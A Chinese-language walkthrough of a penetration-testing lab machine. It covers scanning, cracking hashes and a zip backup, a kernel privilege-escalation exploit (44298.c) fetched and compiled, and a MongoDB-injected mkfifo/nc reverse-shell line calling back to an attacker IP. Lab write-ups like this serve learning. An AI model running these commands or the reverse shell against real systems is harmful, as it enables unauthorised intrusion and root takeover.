一、主机发现
arp-scan -l
得到靶机ip为192.168.55.152
二、端口扫描、目录枚举、漏洞扫描、指纹识别
2.1端口扫描
nmap --min-rate 10000 -p- 192.168.55.152
发现开放了3000端口,竟然没有开放80端口
扫描UDP端口
nmap -sU --min-rate 10000 -p- 192.168.55.152
发现不存在UDP端口
2.2目录枚举
dirb http://192.168.55.152:3000
没有其它信息,只能通过靶机网站进行信息收集了
2.3漏洞扫描
nmap --script=vuln -p22,3000 192.168.55.152
没有漏洞信息
2.4指纹识别
nmap 192.168.55.152 -sV -sC -O --version-all
三、进入靶机网页进行信息收集,拿到低权限shell
进入靶机页面进行信息收集
发现了登录框,尝试了SQL注入,发现不太行
只好看看网页的源代码了
发现这几个js代码的命令像提示
尝试打开看看,在这个js文件中找到了信息
继续拼接访问
找到了加密后的密码,去进行md5解密
尝试登陆tom用户
发现只有admin才能登陆,而刚刚的js文件都不是admin,只能继续寻找其它js文件
成功找到admin用户
破解密码即可
myP14ceAdm1nAcc0uNT
manchester
成功登陆,然后发现可以下载文件
使用cat命令查看后发现是base64编码后的文件,先进行解码
cat myplace.backup | base64 -d >5.txt
发现这个文件是zip文件,解压需要密码
爆破压缩密码
fcrackzip -u -D -p rockyou.txt 5.zip
命令解释:
-D 指定方式为字典猜解
-p 指定猜解字典的路径
-u 表示只显示破解出来的密码,其他错误的密码不显示出
成功爆破出来密码:magicword
查看一下app.js文件,成功找到mark用户账号密码
mark
5AYRft73VtFpc84k
成功登陆!
四、提权
4.1靶机信息收集
发现该用户没有sudo权限,没有定时任务,只好尝试在靶机内进行信息收集
4.2exp提权
尝试符合靶机版本的exp
searchsploit Ubuntu 16.04 privilege # 搜索符合靶机版本的提权漏洞
经尝试发现44298.c可以
cd tmp
http://192.168.55.132/44298.c
gcc -o 44298 44298.c
./44298
成功提权!
4.3登陆tom用户
刚刚获得mark账号密码时,发现是连接了Mongodb数据库,尝试使用markidentity进行登陆
mongo -u mark -p 5AYRft73VtFpc84k scheduler
show collections #查看数据库中的集合(类似于mysql中的表)
db.tasks.find({}) #查询tasks中的所有文件
发现里面没有文档,我们可以尝试在其中插入文档进行反弹shell
db.tasks.insert({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.55.132 8888 >/tmp/f"})
成功登陆tom用户
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
